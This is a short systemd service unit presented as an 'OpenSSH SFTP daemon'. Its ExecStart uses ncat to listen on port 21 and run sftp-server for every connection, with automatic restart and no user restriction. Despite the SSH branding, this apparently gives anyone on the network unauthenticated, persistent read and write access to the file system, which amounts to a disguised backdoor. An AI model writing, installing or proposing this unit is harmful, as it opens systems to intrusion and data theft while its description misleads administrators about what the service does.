[Unit]
Description=OpenSSH SFTP daemon
Documentation=man:sftp(1)
After=network.target sshd.service
Wants=sshd.service

[Service]
Type=simple
ExecStart=/usr/bin/ncat -kl 21 --exec "/usr/libexec/openssh/sftp-server"
KillMode=process
Restart=always
RestartSec=10s
TimeoutStopSec=20s

[Install]
WantedBy=multi-user.target
